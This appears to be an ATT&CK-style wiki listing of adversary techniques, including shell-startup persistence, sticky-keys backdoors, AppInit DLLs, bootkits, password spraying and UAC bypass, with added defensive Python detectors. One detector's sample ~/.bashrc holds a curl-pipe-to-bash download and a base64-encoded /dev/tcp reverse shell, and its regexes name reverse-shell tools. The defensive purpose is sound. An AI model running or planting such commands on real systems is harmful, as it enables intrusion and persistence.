
Property:Has technical description


This is a property of type Text.

Pages using the property "Has technical description"

Showing 25 pages using this property.


.
.bash_profile and .bashrc: <code>~/.bash_profile</code> and <code>~/.bashrc</code> are executed in a user's context when a new shell opens or when a user logs in, so that the environment is set up correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> for interactive non-login shells. This means that when a user logs in (via username and password) to the console, either locally or remotely via something like SSH, <code>~/.bash_profile</code> is executed before the initial command prompt is returned to the user; after that, every time a new interactive shell is opened, <code>~/.bashrc</code> is executed. This gives users fine-grained control over when certain commands run. macOS's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, so it calls <code>~/.bash_profile</code> each time rather than <code>~/.bashrc</code>. These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into them to gain persistence each time the user logs in or opens a new shell.
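An added example (not part of the ATT&CK page) of the defender-side check this implies: scanning shell startup files for lines that look like appended persistence. The sample <code>~/.bashrc</code> is constructed here, and the rule patterns are heuristics chosen for this example, not a signature set from any product.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample ~/.bashrc: a normal user configuration with three lines an
# adversary appended for persistence. Not taken from a real host.
SAMPLE_BASHRC = """\
# ~/.bashrc
export PATH="$HOME/bin:$PATH"
alias ll='ls -alF'
[ -f ~/.bash_aliases ] && . ~/.bash_aliases
# keep shell fast
(curl -s http://203.0.113.10/a.sh | bash) >/dev/null 2>&1 &
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8yMDMuMC4xMTMuMTAvNDQ0NCAwPiYx | base64 -d | bash
alias sudo='/tmp/.cache/sudo'
"""

# Heuristic rules (name, regex). These are assumptions about what persistence
# lines tend to look like, not an exhaustive signature set.
RULES: List[Tuple[str, re.Pattern]] = [
    ("download_and_execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("decoded_payload", re.compile(r"\bbase64\s+(-d|--decode)\b.*\|\s*(ba|z)?sh\b")),
    ("reverse_shell", re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|\bncat\b.*--exec")),
    ("backgrounded_and_silenced", re.compile(r">\s*/dev/null\s+2>&1\s*&\s*$")),
    ("alias_to_hidden_or_tmp_path",
     re.compile(r"^alias\s+\w+=['\"]?(/tmp|/dev/shm|/var/tmp|\S*/\.\w+)/")),
]

# Files bash reads at login / on interactive start (the page names the first two;
# .bash_login and .profile are the login-shell fallbacks bash tries in that order).
STARTUP_FILES = [".bash_profile", ".bash_login", ".profile", ".bashrc"]


def audit_rc_file(content: str) -> List[Dict[str, object]]:
    """Return one finding per non-comment line that trips at least one rule."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        hits = [name for name, rx in RULES if rx.search(stripped)]
        if hits:
            findings.append({"line": lineno, "rules": hits, "text": stripped})
    return findings


def audit_home(home_dir: str) -> Dict[str, List[Dict[str, object]]]:
    """Audit every startup file present under a home directory (live-host usage)."""
    import os
    results = {}
    for name in STARTUP_FILES:
        path = os.path.join(home_dir, name)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                results[name] = audit_rc_file(fh.read())
    return results


if __name__ == "__main__":
    for f in audit_rc_file(SAMPLE_BASHRC):
        print(f"line {f['line']}: {', '.join(f['rules'])}: {f['text']}")
```

Running it on the constructed sample flags lines 6, 7 and 8 and leaves the legitimate `PATH`, `alias ll` and `.bash_aliases` lines alone; on a real host, `audit_home(os.path.expanduser("~"))` walks the files in the order bash would consult them.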
A
Access Token Manipulation: Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started it; the process then also takes on the security context associated with the new token. Microsoft promotes this use of access tokens as a security best practice: administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command <code>runas</code>. [[CiteRef::Microsoft runas]] Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (e.g., administrator) to steal a token, and adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. [[CiteRef::Pentestlab Token Manipulation]] Adversaries can also create spoofed access tokens if they know the credentials of a user; any standard user can use the <code>runas</code> command, and the Windows API functions, to do this, so it does not require access to an administrator account. Lastly, an adversary can use a spoofed token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. Metasploit's Meterpreter payload allows arbitrary token stealing and uses token stealing to escalate privileges. [[CiteRef::Metasploit access token]] The Cobalt Strike Beacon payload allows arbitrary token stealing and can also create tokens. [[CiteRef::Cobalt Strike Access Token]]
Accessibility Features: Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the Shift key is pressed five times, and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. [[CiteRef::FireEye Hikit Rootkit]] Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replacement binary needs to be digitally signed on x64 systems, must reside in <code>%systemdir%\</code>, and must be protected by Windows File or Resource Protection (WFP/WRP). [[CiteRef::DEFCON2016 Sticky Keys]] The debugger method was likely discovered as a workaround because it does not require the accessibility feature binary to be replaced. Examples of both methods:
* Binary replacement (Windows XP and later, Windows Server 2003/R2 and later): the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) is replaced with <code>cmd.exe</code> or another program that provides backdoor access. Subsequently, pressing the appropriate key combination at the login screen, either at the keyboard or over [[Technique/T1076|Remote Desktop Protocol]], causes the replaced file to be executed with SYSTEM privileges. [[CiteRef::Tilbury 2014]]
* Debugger method (Windows Vista and later, Windows Server 2008 and later): a Registry key is modified so that <code>cmd.exe</code>, or another program that provides backdoor access, is configured as the "debugger" for the accessibility program (e.g., <code>utilman.exe</code>). After the Registry is modified, pressing the appropriate key combination at the login screen, at the keyboard or over RDP, causes the "debugger" program to be executed with SYSTEM privileges. [[CiteRef::Tilbury 2014]]
Other accessibility features exist that may be leveraged in a similar fashion: [[CiteRef::DEFCON2016 Sticky Keys]]
* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>
Account Discovery: Adversaries may attempt to get a listing of local system or domain accounts.
===Windows===
Example commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [[Software/S0039|Net]] utility, or through use of [[Software/S0105|dsquery]]. If adversaries attempt to identify the primary user, the currently logged-in user, or the set of users that commonly use a system, [[Technique/T1033|System Owner/User Discovery]] may apply.
===Mac===
On macOS, groups can be enumerated through the <code>groups</code> and <code>id</code> commands; <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users. The <code>/etc/passwd</code> file is only consulted in single-user mode, alongside <code>/etc/master.passwd</code>.
===Linux===
On Linux, local users can be enumerated through the <code>/etc/passwd</code> file, which is world readable, and groups through the <code>groups</code> and <code>id</code> commands.
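An added example (not from the ATT&CK page) of the Linux case: parsing a <code>/etc/passwd</code> file the way an adversary's discovery script, or a defender's baseline check, would, to separate accounts that can actually log in from service accounts and to surface any extra UID 0 account. The file content below is constructed for the example.

```python
from typing import Dict, List

# Constructed /etc/passwd content (not copied from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
support:x:0:0:helpdesk:/home/support:/bin/sh
"""

# Shells that refuse interactive login; assumption for this example.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Parse passwd(5) lines: name:password:UID:GID:GECOS:home:shell."""
    accounts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry: skip rather than guess at field meaning
        name, _password, uid, gid, gecos, home, shell = fields
        accounts.append({"name": name, "uid": int(uid), "gid": int(gid),
                         "gecos": gecos, "home": home, "shell": shell})
    return accounts


def interactive_accounts(accounts: List[Dict[str, object]]) -> List[str]:
    """Accounts whose shell allows a login: the ones worth targeting or watching."""
    return [a["name"] for a in accounts if a["shell"] not in NON_LOGIN_SHELLS]


def extra_uid0_accounts(accounts: List[Dict[str, object]]) -> List[str]:
    """UID 0 accounts other than root: a classic backdoor and a high-value find."""
    return [a["name"] for a in accounts if a["uid"] == 0 and a["name"] != "root"]


if __name__ == "__main__":
    accts = parse_passwd(SAMPLE_PASSWD)
    print("interactive:", interactive_accounts(accts))
    print("extra uid 0:", extra_uid0_accounts(accts))
```

On a live system, replace `SAMPLE_PASSWD` with the contents of `/etc/passwd`; the same fields apply to `getent passwd` output, which also includes directory-backed accounts.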
Account Manipulation: Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.
AppInit DLLs: DLLs that are specified in the <code>AppInit_DLLs</code> value in the Registry key <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll, which in practice is nearly every program. This value can be abused to obtain persistence by causing a DLL to be loaded into most processes on the computer. [[CiteRef::AppInit Registry]] Loading only happens when the <code>LoadAppInit_DLLs</code> value in the same key is set to 1, and 32-bit processes on 64-bit Windows read the corresponding key under <code>Wow6432Node</code>, so both locations should be checked. The AppInit DLL functionality is disabled in Windows 8 and later versions when Secure Boot is enabled. [[CiteRef::AppInit Secure Boot]]
AppleScript: macOS and OS X applications send AppleEvent messages to each other for interprocess communication (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. <code>osascript</code> executes AppleScript and any other Open Scripting Architecture (OSA) language scripts; a list of OSA languages installed on a system can be found with the <code>osalang</code> program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Adversaries can use this to interact with open SSH connections, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications that are already running remotely. Since this is a scripting language, it can also be used to launch more common techniques, such as a reverse shell via Python. [[CiteRef::Macro Malware Targets Macs]] Scripts can be run from the command line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.
Application Deployment Software: Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment. Access to a network-wide or enterprise-wide software deployment system gives an adversary remote code execution on all systems that are connected to it. The access may be used to move laterally to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
Application Shimming: The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow programs to keep working as Windows updates and changes its code; for example, it allows programs written for Windows XP to work on Windows 10. Within the framework, shims act as a buffer between the program (more specifically, its Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine whether the program requires the use of a shim database (.sdb). If so, the shim database uses API hooking to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* <code>%WINDIR%\AppPatch\sysmain.sdb</code>
* <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>
Custom databases are stored in:
* <code>%WINDIR%\AppPatch\custom</code> and <code>%WINDIR%\AppPatch\AppPatch64\Custom</code>
* <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>
To keep shims secure, Windows runs them in user mode so they cannot modify the kernel, and administrator privileges are required to install a shim. However, certain shims can be used to [[Technique/T1088|Bypass User Account Control]] (UAC) (RedirectEXE), inject DLLs into processes (InjectDll), and intercept memory addresses (GetProcAddress). Using these shims, an adversary can perform several malicious acts, such as elevating privileges, installing backdoors, and disabling defenses like Windows Defender.
Application Window Discovery: Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. On macOS, this can be done natively with a small [[Technique/T1155|AppleScript]] script.
Audio Capture: An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening in on sensitive conversations to gather information. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
Authentication Package: Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. [[CiteRef::MSDN Authentication Packages]] Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> in the value <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.
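The three Registry-based persistence locations described above (the Accessibility Features debugger method, AppInit DLLs, and LSA Authentication Packages) can be audited from one <code>reg export</code> file. The following is an added example, not code from the ATT&CK page: a small parser for the subset of <code>.reg</code> syntax that <code>reg export</code> emits, with a check per technique. The export text is constructed; the DLL path, the <code>evilpkg</code> package name, and the assumption that <code>msv1_0</code> is the only expected default package are illustrative.

```python
import re
from typing import Dict, List

# Constructed .reg export (the format `reg export` writes) containing one entry
# of each kind discussed above. Paths, DLL and package names are illustrative.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\someapp.exe]
"GlobalFlag"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\ProgramData\\upd\\helper.dll"
"LoadAppInit_DLLs"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,65,00,\
  76,00,69,00,6c,00,70,00,6b,00,67,00,00,00,00,00
"""

ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                          "narrator.exe", "displayswitch.exe", "atbroker.exe"}
IFEO_PREFIX = (r"hkey_local_machine\software\microsoft\windows nt\currentversion"
               r"\image file execution options" + "\\")
APPINIT_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\windows"
LSA_KEY = r"hkey_local_machine\system\currentcontrolset\control\lsa"
DEFAULT_AUTH_PACKAGES = {"msv1_0"}  # assumption: baseline for a default install


def _join_continuations(text: str) -> List[str]:
    """Rejoin hex(...) values that `reg export` wraps with trailing backslashes."""
    lines, buf = [], ""
    for raw in text.splitlines():
        s = raw.strip()
        if s.endswith("\\"):
            buf += s[:-1]
            continue
        lines.append(buf + s)
        buf = ""
    return lines


def _decode(data: str):
    """Decode "string", dword:hex and hex(7): (REG_MULTI_SZ as UTF-16LE) values."""
    if data.startswith('"') and data.endswith('"'):
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if data.startswith("dword:"):
        return int(data[6:], 16)
    m = re.match(r"hex(?:\((\d+)\))?:(.*)", data)
    if m:
        raw = bytes.fromhex(m.group(2).replace(",", ""))
        if m.group(1) == "7":
            return [s for s in raw.decode("utf-16-le").split("\0") if s]
        return raw
    return data


def parse_reg_export(text: str) -> Dict[str, Dict[str, object]]:
    """Map lower-cased key path -> {lower-cased value name: decoded data}."""
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for line in _join_continuations(text):
        if not line or line.startswith((";", "Windows Registry Editor")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, data = line.split("=", 1)
            keys[current][name.strip().strip('"').lower()] = _decode(data.strip())
    return keys


def ifeo_accessibility_debuggers(keys: Dict[str, Dict[str, object]]) -> Dict[str, str]:
    """Accessibility binaries that have a Debugger set under IFEO."""
    hits = {}
    for key, values in keys.items():
        if key.startswith(IFEO_PREFIX):
            exe = key[len(IFEO_PREFIX):]
            if exe in ACCESSIBILITY_BINARIES and "debugger" in values:
                hits[exe] = values["debugger"]
    return hits


def appinit_dlls(keys: Dict[str, Dict[str, object]]) -> Dict[str, object]:
    """AppInit_DLLs entries and whether LoadAppInit_DLLs actually enables them."""
    values = keys.get(APPINIT_KEY, {})
    raw = values.get("appinit_dlls", "")
    dlls = [d for d in re.split(r"[ ,;]+", raw) if d] if isinstance(raw, str) else []
    return {"dlls": dlls, "loading_enabled": values.get("loadappinit_dlls") == 1}


def nondefault_auth_packages(keys: Dict[str, Dict[str, object]]) -> List[str]:
    pkgs = keys.get(LSA_KEY, {}).get("authentication packages", [])
    if isinstance(pkgs, str):
        pkgs = [pkgs]
    return [p for p in pkgs if p.lower() not in DEFAULT_AUTH_PACKAGES]


def audit(text: str) -> Dict[str, object]:
    keys = parse_reg_export(text)
    return {"ifeo_debuggers": ifeo_accessibility_debuggers(keys),
            "appinit": appinit_dlls(keys),
            "auth_packages": nondefault_auth_packages(keys)}


if __name__ == "__main__":
    print(audit(SAMPLE_REG_EXPORT))
```

On a real host, feed it the output of <code>reg export HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion</code> and <code>reg export HKLM\SYSTEM\CurrentControlSet\Control\Lsa</code> (and the <code>Wow6432Node</code> copy for AppInit on 64-bit systems); a debugger on any accessibility binary, a populated AppInit list with loading enabled, or an authentication package outside the baseline each warrants a look at the referenced file.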
Automated Collection: Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [[Technique/T1064|Scripting]] to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [[Technique/T1083|File and Directory Discovery]] and [[Technique/T1105|Remote File Copy]] to identify and move files.
Automated Exfiltration: Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [[Technique/T1064|Scripting]] after being gathered during [[Collection]]. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [[Technique/T1041|Exfiltration Over Command and Control Channel]] and [[Technique/T1048|Exfiltration Over Alternative Protocol]].
B
Bash History: Bash keeps track of the commands users type on the command line with the "history" utility. Once a user logs out, the history is flushed to the user's <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user's last 500 commands. Users often type usernames and passwords on the command line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. [[CiteRef::External to DA, the OS X Way]]
Binary Padding: Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.
Bootkit: A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). [[CiteRef::MTrends 2016]] Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
===Master Boot Record===
The MBR is the section of disk that is first loaded after the BIOS completes hardware initialization. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. [[CiteRef::Lau 2011]]
===Volume Boot Record===
The MBR passes control of the boot process to the VBR. Similar to the case of the MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
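An added example, not from the ATT&CK page, of what "raw access to the boot drive" lets an adversary change and what a defender can verify: a parser for the 512-byte MBR layout (440 bytes of bootstrap code, the disk signature, four 16-byte partition entries, and the 0x55AA boot signature) with a check that compares the bootstrap code against a known-good hash. The bootstrap bytes, partition table and baseline below are constructed for the example; in practice the baseline hash comes from a gold image of the same boot loader.

```python
import hashlib
import struct
from typing import Dict, List

MBR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"
ENTRY_FMT = "<B3sB3sII"   # status, CHS start, type, CHS end, LBA start, sector count


def build_mbr(bootstrap: bytes, partitions: List[Dict[str, int]],
              disk_signature: int = 0x1234ABCD) -> bytes:
    """Assemble an MBR: bootstrap code, disk signature, 2 reserved bytes,
    partition table, 0x55AA. Used here only to construct sample sectors."""
    if len(bootstrap) > 440:
        raise ValueError("bootstrap code exceeds 440 bytes")
    code = bootstrap.ljust(440, b"\x00")
    table = b"".join(
        struct.pack(ENTRY_FMT, 0x80 if p.get("bootable") else 0x00, b"\x00" * 3,
                    p["type"], b"\x00" * 3, p["lba_start"], p["sectors"])
        for p in partitions[:4])
    return code + struct.pack("<IH", disk_signature, 0) + table.ljust(64, b"\x00") + BOOT_SIGNATURE


def parse_mbr(mbr: bytes) -> Dict[str, object]:
    """Split a raw sector 0 into the fields an analyst cares about."""
    if len(mbr) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    partitions = []
    for i in range(4):
        status, _chs0, ptype, _chs1, lba, sectors = struct.unpack_from(ENTRY_FMT, mbr, 446 + 16 * i)
        if ptype == 0:
            continue  # empty slot
        partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba, "sectors": sectors})
    return {
        "bootstrap_sha256": hashlib.sha256(mbr[:440]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", mbr, 440)[0],
        "partitions": partitions,
        "signature_ok": mbr[510:512] == BOOT_SIGNATURE,
    }


def check_mbr(mbr: bytes, baseline_bootstrap_sha256: str) -> List[str]:
    """Return human-readable issues; an empty list means the sector matches baseline."""
    info = parse_mbr(mbr)
    issues = []
    if not info["signature_ok"]:
        issues.append("boot signature 0x55AA missing")
    if info["bootstrap_sha256"] != baseline_bootstrap_sha256:
        issues.append("bootstrap code differs from baseline")
    bootable = [p for p in info["partitions"] if p["bootable"]]
    if len(bootable) != 1:
        issues.append(f"{len(bootable)} partitions flagged bootable, expected 1")
    return issues


# Constructed data: a short stand-in for legitimate bootstrap code, a modified
# version an adversary might write in its place, and a two-partition table.
CLEAN_BOOTSTRAP = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c\xfb" + b"\x90" * 16
TAMPERED_BOOTSTRAP = b"\xeb\x3c\x90\x33\xc0" + b"\xcc" * 40
PARTITIONS = [{"bootable": 1, "type": 0x07, "lba_start": 2048, "sectors": 204800},
              {"bootable": 0, "type": 0x83, "lba_start": 206848, "sectors": 409600}]

CLEAN_MBR = build_mbr(CLEAN_BOOTSTRAP, PARTITIONS)
TAMPERED_MBR = build_mbr(TAMPERED_BOOTSTRAP, PARTITIONS)
# Assumption: the baseline is taken from the clean sample; use a gold image in practice.
BASELINE_HASH = parse_mbr(CLEAN_MBR)["bootstrap_sha256"]


if __name__ == "__main__":
    print("clean:", check_mbr(CLEAN_MBR, BASELINE_HASH))
    print("tampered:", check_mbr(TAMPERED_MBR, BASELINE_HASH))
```

To run it against a real disk, read the first 512 bytes of the block device (for example <code>/dev/sda</code> on Linux, which requires root) and pass them to <code>check_mbr</code>; because the bootstrap hash is the only thing being compared, a bootkit that changes only the partition table's start sectors to chain to its own code would still be visible in <code>parse_mbr</code>'s <code>partitions</code> output even when the hash matches.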
Brute Force: Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained. [[Technique/T1003|Credential Dumping]] to obtain password hashes may only get an adversary so far when [[Technique/T1075|Pass the Hash]] is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. [[CiteRef::Wikipedia Password cracking]] Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation, either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. [[CiteRef::Cylance Cleaver]] A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password against many different accounts on a network to avoid the account lockouts that would normally occur when brute forcing a single account with many passwords. [[CiteRef::BlackHillsInfosec Password Spraying]]
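The difference between the two login-guessing patterns above is visible in authentication logs, and it is the reason spraying slips under lockout policies: many failures against one account versus one or two failures against many accounts from the same source. The following added example (not from the ATT&CK page) implements both detections over constructed sshd-style log lines; the thresholds and window are assumptions for the example and should be tuned to the environment's lockout policy.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sshd-style authentication log; addresses are documentation ranges.
SAMPLE_AUTH_LOG = """\
2024-03-01T09:00:01 sshd[401]: Failed password for alice from 198.51.100.7 port 50110 ssh2
2024-03-01T09:00:03 sshd[402]: Failed password for alice from 198.51.100.7 port 50111 ssh2
2024-03-01T09:00:05 sshd[403]: Failed password for alice from 198.51.100.7 port 50112 ssh2
2024-03-01T09:00:07 sshd[404]: Failed password for alice from 198.51.100.7 port 50113 ssh2
2024-03-01T09:00:09 sshd[405]: Failed password for alice from 198.51.100.7 port 50114 ssh2
2024-03-01T09:00:11 sshd[406]: Failed password for alice from 198.51.100.7 port 50115 ssh2
2024-03-01T10:15:00 sshd[510]: Failed password for alice from 203.0.113.9 port 41000 ssh2
2024-03-01T10:15:02 sshd[511]: Failed password for bob from 203.0.113.9 port 41001 ssh2
2024-03-01T10:15:04 sshd[512]: Failed password for carol from 203.0.113.9 port 41002 ssh2
2024-03-01T10:15:06 sshd[513]: Failed password for invalid user dave from 203.0.113.9 port 41003 ssh2
2024-03-01T10:15:08 sshd[514]: Failed password for erin from 203.0.113.9 port 41004 ssh2
2024-03-01T10:15:10 sshd[515]: Accepted password for erin from 203.0.113.9 port 41005 ssh2
2024-03-01T11:00:00 sshd[600]: Failed password for bob from 10.0.0.12 port 3000 ssh2
"""

LINE_RX = re.compile(r"^(\S+) sshd\[\d+\]: (Failed|Accepted) password for "
                     r"(?:invalid user )?(\S+) from (\S+) port \d+")

Event = Dict[str, object]
Alert = Tuple[str, str, str]


def parse_auth_log(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        m = LINE_RX.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m.group(1)),
                           "ok": m.group(2) == "Accepted",
                           "user": m.group(3), "src": m.group(4)})
    return events


def detect(events: List[Event], window: timedelta = timedelta(minutes=10),
           brute_threshold: int = 5, spray_min_users: int = 4,
           spray_max_per_user: int = 2) -> List[Alert]:
    failures = sorted((e for e in events if not e["ok"]), key=lambda e: e["ts"])
    alerts: List[Alert] = []

    # Brute force: one source, one account, >= brute_threshold failures in a window.
    per_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for e in failures:
        per_pair[(e["src"], e["user"])].append(e["ts"])
    for (src, user), ts in per_pair.items():
        j = 0
        for i in range(len(ts)):
            while ts[i] - ts[j] > window:
                j += 1
            if i - j + 1 >= brute_threshold:
                alerts.append(("brute_force", src, user))
                break

    # Password spray: one source, many accounts, few failures per account, all
    # inside one window (each account stays below the lockout threshold).
    per_src: Dict[str, List[Event]] = defaultdict(list)
    for e in failures:
        per_src[e["src"]].append(e)
    spraying = set()
    for src, evs in per_src.items():
        j = 0
        for i in range(len(evs)):
            while evs[i]["ts"] - evs[j]["ts"] > window:
                j += 1
            counts: Dict[str, int] = defaultdict(int)
            for e in evs[j:i + 1]:
                counts[e["user"]] += 1
            if len(counts) >= spray_min_users and max(counts.values()) <= spray_max_per_user:
                spraying.add(src)
                break
    for src in sorted(spraying):
        users = {e["user"] for e in per_src[src]}
        alerts.append(("password_spray", src, f"{len(users)} accounts"))
        for e in events:  # a success from a spraying source is the alert that matters most
            if e["ok"] and e["src"] == src:
                alerts.append(("spray_followed_by_success", src, e["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

On the sample the single-account burst from 198.51.100.7 is reported as brute force, 203.0.113.9 is reported as spraying five accounts and then succeeding as <code>erin</code>, and the lone failure from 10.0.0.12 produces nothing. The same logic applies to Windows 4625/4624 events once they are normalized into the same (timestamp, result, user, source) shape.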
Bypass User Account Control: Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact on the user ranges from denying the operation under high enforcement, to allowing the user to perform the action if they are in the local administrators group and click through the prompt, to requiring an administrator password to complete the action. [[CiteRef::TechNet How UAC Works]] If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. [[CiteRef::TechNet Inside UAC]][[CiteRef::MSDN COM Elevation]] An example of this is the use of rundll32.exe to load a specially crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory that would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. [[CiteRef::Davidson Windows]] Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected. Many methods have been discovered to bypass UAC. The GitHub readme page for UACMe contains an extensive list of methods [[CiteRef::Github UACMe]] that have been discovered and implemented within UACMe, but it may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some are used in the wild, such as:
